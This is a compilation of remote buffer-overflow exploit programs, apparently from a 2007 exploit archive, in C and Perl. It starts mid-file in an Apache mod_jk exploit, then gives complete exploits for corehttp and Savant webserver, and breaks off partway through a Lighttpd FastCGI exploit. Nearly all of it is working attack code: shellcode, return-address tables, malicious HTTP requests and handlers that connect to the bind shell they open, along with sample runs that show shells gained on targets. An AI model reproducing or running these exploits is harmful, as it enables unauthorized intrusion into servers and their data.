u_long retaddr;
u_long strcpy_plt;
int offset;
u_long pop_pop_pop_ret_code;
u_long pop_pop_ret_code;
u_long ret_code;
u_long worker_arg1;
} targets[] = {
{0,"Fedora Core release 5 (Bordeaux) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_ TO_WORKER_1_FC5},
{1,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19\n"
"\ttarball install: /usr/local/apache\n"
"\tbinary install: mod_jk-apache-2.0.49-linux-i686.so",
27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI _TO_WORKER_1_FC6},
{2,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI _TO_WORKER_1_FC6},
{3,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_ TO_WORKER_1_FC6},
}, victim;
void re_connt(int sock);
void conn_shell(int sock,char *cmdz);
void usage(char *argv0);
void banrl();
int main(int argc,char *argv[]){
int sock;
int i=0,j=0,l=0,b=0;
unsigned char do_ex[8192];
unsigned char ex_buf[8192*2];
unsigned char sm_buf[4];
char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ;
memset(&victim,0,sizeof(victim));
banrl();
while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){
switch(i){
case 'h':
hostp=(char *)strtok(optarg,":");
if((portp=(char *)strtok(NULL,":"))==NULL)
portp="80";
break;
case 't':
if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){
usage(argv[0]);
return -1;
}
memcpy(&victim,&targets[atoi(optarg)],sizeof(victim));
break;
case 'c':
victim.ret_count=atoi(optarg);
break;
case 'r':
victim.retaddr=strtoul(optarg,NULL,16);
break;
case 's':
victim.strcpy_plt=strtoul(optarg,NULL,16);
break;
case 'p':
victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16 );
break;
case 'o':
victim.offset=atoi(optarg);
break;
case 'm':
victim.worker_arg1=strtoul(optarg,NULL,16);
break;
case 'C':
cmdz=optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(!victim.ret_count||!victim.retaddr||!victim.str cpy_plt||!victim.offset||!victim.pop_pop_pop_ret_c ode||!victim.worker_arg1||!hostp||!portp){
usage(argv[0]);
return -1;
}
victim.pop_pop_ret_code=victim.pop_pop_pop_ret_cod e+1;
victim.ret_code=victim.pop_pop_pop_ret_code+3;
printf(" os: %s\n\n",victim.type);
printf(" host: %s\n",hostp);
printf(" port: %s\n",portp);
printf(" count: %d\n",victim.ret_count);
printf(" strcpy@plt: %p\n",victim.strcpy_plt);
printf(" offset: %d\n",victim.offset);
printf(" pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code);
printf(" pop_pop_ret_code: %p\n",victim.pop_pop_ret_code);
printf(" ret_code: %p\n",victim.ret_code);
printf(" map_uri_to_worker() arg1: %p\n",victim.worker_arg1);
printf(" start retaddr: %p\n\n",victim.retaddr);
putchar(';');
srand(getpid());
for(b=0;;victim.retaddr+=RET_ADDR_INC){
putchar((rand()%2)? 'P':'p');
fflush(stdout);
usleep(100000);
memset((char *)do_ex,0,sizeof(do_ex));
memset((char *)ex_buf,0,sizeof(ex_buf));
memset((char *)sm_buf,0,sizeof(sm_buf));
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
for(i=0;i<victim.offset-1;i++){
sprintf(do_ex+i,"%c",PADDING_1);
}
__GOGOSSING(do_ex,i,victim.pop_pop_pop_ret_code);
__GOGOSSING(do_ex,i,victim.worker_arg1); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_2); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_3); /* pop */
for(j=0;j<victim.ret_count;j++){
__GOGOSSING(do_ex,i,victim.ret_code);
}
__GOGOSSING(do_ex,i,victim.strcpy_plt); /* ret */
__GOGOSSING(do_ex,i,victim.ret_code);
__GOGOSSING(do_ex,i,victim.retaddr); /* library */
sprintf(ex_buf,"GET /");
l=strlen(ex_buf);
for(j=0;j<i;j++){
if((do_ex[j]>0x08)&&(do_ex[j]<0x0e)){
memset((char *)sm_buf,0,sizeof(sm_buf));
sprintf(sm_buf,"%02x",do_ex[j]);
ex_buf[l++]='%';
ex_buf[l++]=sm_buf[0];
ex_buf[l++]=sm_buf[1];
}
else ex_buf[l++]=do_ex[j];
}
l=strlen(ex_buf);
sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM);
sock=setsock(hostp,atoi(portp));
re_connt(sock);
send(sock,ex_buf,strlen(ex_buf),0);
close(sock);
sock=setsock(hostp,SH_PORT);
if(sock!=-1){
printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n"
"pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr,
victim.strcpy_plt,victim.pop_pop_pop_ret_code,vict im.worker_arg1);
conn_shell(sock,cmdz);
exit(-1);
}
}
}
int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;
if((he=gethostbyname(host))==NULL)
{
return -1;
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
return -1;
}
x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
return -1;
}
return(sock);
}
void re_connt(int sock)
{
if(sock==-1)
{
printf("\n[-] ");
fflush(stdout);
perror("connect()");
printf("[-] exploit failed.\n");
exit(-1);
}
}
void conn_shell(int sock,char *cmdz)
{
int pckt;
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);
send(sock,cmdz,strlen(cmdz),0);
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}
void usage(char *argv0){
int i;
printf("Usage: %s <-switches> -h host[:80]\n",argv0);
printf(" -h host[:port]\tHost\n");
printf(" -t number\t\tTarget id.\n");
printf(" -c ret_count\t\tret count\n");
printf(" -r retaddr\t\tstart library retaddr\n");
printf(" -s strcpy@plt\t\tstrcpy plt address\n");
printf(" -p pop3/ret\t\tpop3/ret address\n");
printf(" -o offset\t\tOffset\n");
printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n");
printf(" -C cmdz\t\tCommands\n");
printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0);
printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
printf(" ID / Return addr / Target specification\n");
for(i=0;i<sizeof(targets)/sizeof(victim);i++)
printf("% 3d / 0x%08x /\n\t%s\n\n",i,targets[i].retaddr,targets[i].type);
exit(-1);
}
void banrl(){
printf("INetCop(c) Security\t\t\t\t\t%s\n\n",HOST_PARAM);
}
/*
**
** Fedora core 5 exploit:
** --
** $ ./0x82-apache-mod_jk -t 0 -h fc5.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** os: Fedora Core release 5 (Bordeaux) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** host: fc5.inetcop.org
** port: 80
** count: 3
** strcpy@plt: 0x8060c80
** offset: 4112
** pop_pop_pop_ret_code: 0x8060dc4
** pop_pop_ret_code: 0x8060dc5
** ret_code: 0x8060dc7
** map_uri_to_worker() arg1: 0x80474bc
** start retaddr: 0x100104
**
** ;PPPpppPpppPpppPPpPpPPPppPppPPppPPpPPpPPPPPP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x154104, strcpy@plt=0x8060c80,
** pop3/ret=0x8060dc4, worker_arg1=0x80474bc
**
** Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
** Fedora core 6 exploit:
** --
** $ ./0x82-apache-mod_jk -t 3 -h fc6.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** os: Fedora Core release 6 (Zod) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** host: fc6.inetcop.org
** port: 80
** count: 3
** strcpy@plt: 0x8060164
** offset: 4112
** pop_pop_pop_ret_code: 0x80614d4
** pop_pop_ret_code: 0x80614d5
** ret_code: 0x80614d7
** map_uri_to_worker() arg1: 0x80476a4
** start retaddr: 0x100104
**
** ;pPpPppppPpppPppPPPpPPpPppPpPpPPpPPPPPpP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x14c104, strcpy@plt=0x8060164,
** pop3/ret=0x80614d4, worker_arg1=0x80476a4
**
** Linux localhost 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
*/
/* eox */
// [2007-07-08]
80 corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* target : dual.fakehalo.lan:5555 *
* return address : 0xbfffea60 *
* *sprocket replacement : 0xbfffec60 *
* *
* attempting to connect: dual.fakehalo.lan:5555. *
* successfully connected: dual.fakehalo.lan:5555. *
* sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* closing connection. *
* *
* attempting to connect: dual.fakehalo.lan:7979. *
* successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
************************************************** *************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x 4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x 4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x 44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x 41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x 41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x 42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x 48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x 4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x 44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x 44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x 41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf(" corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n by: vade79/v9 [email protected] (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf(" target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf(" return address\t\t: 0x%.8x\n",tbl.addr);
printf(" *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf(" attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf(" successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf(" sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf(" closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf(" attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf(" successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// [2007-07-29]
80 Savant 3.1 Get Request Remote Overflow Exploit (Universal)
#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka [email protected]
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl <victim> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
#Metasploit shellcode
$shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb5".
"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x 5d\xac\xba\x2b".
"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\x cd\x54\xaa\x5f".
"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x 5b\x64\x85\x4d".
"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x 8e\x01\x61\xfc".
"\xc0\xb0\xce\x8b\x91\x54\xae\xb2\x3e\x59\x0e\x5f\x ea\x49\x44\x3f".
"\xb6\x79\xce\x5d\xd9\x71\x59\xb5\x76\x64\x9e\xb0\x 3e\x16\x75\x5f".
"\xf5\x59\xce\xa4\xa9\xf8\xce\x94\xbd\x0b\x2d\x5a\x fb\x5b\xa9\x84".
"\x4a\x83\x23\x87\xd3\x3d\x76\xe6\xdd\x22\x36\xe6\x ea\x01\xba\x04".
"\xdd\x9e\xa8\x28\x8e\x05\xba\x02\xea\xdc\xa0\xb2\x 34\xb8\x4d\xd6".
"\xe0\x3f\x47\x2b\x65\x3d\x9c\xdd\x40\xf8\x12\x2b\x 63\x06\x16\x87".
"\xe6\x06\x06\x87\xf6\x06\xba\x04\xd3\x3d\x54\x88\x d3\x06\xcc\x35".
"\x20\x3d\xe1\xce\xc5\x92\x12\x2b\x63\x3f\x55\x85\x e0\xaa\x95\xbc".
"\x11\xf8\x6b\x3d\xe2\xaa\x93\x87\xe0\xaa\x95\xbc\x 50\x1c\xc3\x9d".
"\xe2\xaa\x93\x84\xe1\x01\x10\x2b\x65\xc6\x2d\x33\x cc\x93\x3c\x83".
"\x4a\x83\x10\x2b\x65\x33\x2f\xb0\xd3\x3d\x26\xb9\x 3c\xb0\x2f\x84".
"\xec\x7c\x89\x5d\x52\x3f\x01\x5d\x57\x64\x85\x27\x 1f\xab\x07\xf9".
"\x4b\x17\x69\x47\x38\x2f\x7d\x7f\x1e\xfe\x2d\xa6\x 4b\xe6\x53\x2b".
"\xc0\x11\xba\x02\xee\x02\x17\x85\xe4\x04\x2f\xd5\x e4\x04\x10\x85".
"\x4a\x85\x2d\x79\x6c\x50\x8b\x87\x4a\x83\x2f\x2b\x 4a\x62\xba\x04".
"\x3e\x02\xb9\x57\x71\x31\xba\x02\xe7\xaa\x95\xbc\x 45\xdf\x41\x8b".
"\xe6\xaa\x93\x2b\x65\x55\x45\xd4";
$nop="\x90"x201;
$incbh="\xfe\xc7"x4; # inc bh opcode
$incebx="\x43"x23; # inc ebx opcode
$asm1 = "\x53\xc3"; # push ebx,ret opcode
$nop1="\x90"x19;
$asm = "\x83\xc4\x8c\x54\xc3"; # add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are # some opcode not allowed and we have need of space for our shellcode
$nop2="\x90"x210;
$eip = "\x74\x86\x41"; # 0x00418674 memory address of pop eax, ret in Savant.exe it's universal
$exploit = $asm. " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."\r\n\r\n" .$nop2.$shellcode;
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
# [2007-08-12]
80 Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit
/************************************************** *********
* hoagie_lighttpd.c
* LIGHTTPD/FASTCGI REMOTE EXPLOIT (<= 1.4.17)
*
* Bug discovered by:
* Mattias Bengtsson <[email protected]>
* Philip Olausson <[email protected]>
* http://www.secweb.se/en/advisories/lighttpd-fastcgi-remote-vulnerability/
*
* FastCGI:
* http://www.fastcgi.com/devkit/doc/fcgi-spec.html
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* [email protected]
* http://www.void.at
*
************************************************** **********/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* don't change this values except you know exactly what you are doing */
#define REQUEST_SIZE_BASE 0x1530a
char FILL_CHAR[] = "void";
char RANDOM_CHAR[] = "01234567890"
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ";
/* just default values */
#define DEFAULT_SCRIPT "/index.php" /* can be changed via -s */
#define DEFAULT_PORT "80" /* can be changed via -p */
#define DEFAULT_NAME "SCRIPT_FILENAME" /* can be changed via -n */
#define DEFAULT_VALUE "/etc/passwd" /* can be change via -a */
#define DEFAULT_SEPARATOR ','
#define BUFFER_SIZE 1024
/* header data type
* defining header name/value content and length
* if a fixed value is set use this one instead of generating content
*/
struct header_t {
int name_length;
char name_char;
int value_length;
char value_char;
char *value_value;
};
/* generate_param
* generate character array (input: comma separated list)
*/
char *generate_param(int *param_size_out,
char **name,
char **value) {
char *param = NULL;
int param_size = 0;
int param_offset = 0;
int i;
int name_length = 0;
int value_length = 0;
for (i = 0; name[i] != NULL && value[i] != NULL; i++) {
name_length = strlen(name[i]);
value_length = strlen(value[i]);
if (name_length > 127) {
param_size += 4;
} else {
param_size++;
}
if (value_length > 127) {
param_size += 4;
} else {
param_size++;
}
param_size += strlen(name[i]) + strlen(value[i]);
param = realloc(param, param_size);
if (param) {
if (strlen(name[i]) > 127) {
param[param_offset++] = (name_length >> 24) | 0x80;
param[param_offset++] = (name_length >> 16) & 0xff;
param[param_offset++] = (name_length >> 8) & 0xff;
param[param_offset++] = name_length & 0xff;
} else {
param[param_offset++] = name_length;
}
if (strlen(value[i]) > 127) {
param[param_offset++] = (value_length >> 24) | 0x80;
param[param_offset++] = (value_length >> 16) & 0xff;
param[param_offset++] = (value_length >> 8) & 0xff;
param[param_offset++] = value_length & 0xff;
} else {
param[param_offset++] = value_length;
}
memcpy(param + param_offset, name[i], name_length);
param_offset += name_length;
memcpy(param + param_offset, value[i], value_length);
param_offset += value_length;
}
}
if (param) {
*param_size_out = param_size;
}
return param;
}
/* generate_buffer
* generate header name or value buffer
*/
char *generate_buffer(int length, char c, int random_mode) {
char *buffer = (char*)malloc(length + 1);
int i;
if (buffer) {
memset(buffer, 0, length + 1);
if (random_mode) {
for (i = 0; i < length; i++) {
buffer[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];
}
} else {
memset(buffer, c, length);
}
}
return buffer;
}
/* generate_array
* generate character array (input: comma separated list)
*/
char **generate_array(char *list, char separator, int *length) {
char **data = NULL;
int i = 0;
int start = 0;
int j = 1;
if (list) {
for (i = 0; i <= strlen(list); i++) {
if (list[i] == separator ||
i == strlen(list)) {
data = realloc(data, (j + 1) * (sizeof(char*)));
if (data) {
data[j - 1] = malloc(i - start + 1);
if (data[j - 1]) {
strncpy(data[j - 1], list + start, i - start);
data[j - 1][i - start + 1] = 0;
}
data[j] = NULL;
}
start = i + 1;
j++;
}
}
*length = j;
}
return data;
}
/* generate_request
* generate http request to trigger the overflow in fastcgi module
* and overwrite fcgi param data with post content
*/
char *generate_request(char *server, char *port,
char *script, char **names,
char **values, int *length_out,
int random_mode) {
char *param;
int param_size;
char *request;
int offset;
int length;
int i;
int fillup;
char *name;
char *value;
/* array of header data that is used to create header name and value lines
* most of this values can be changed -> only length is important and a
* few characters */
struct header_t header[] = {
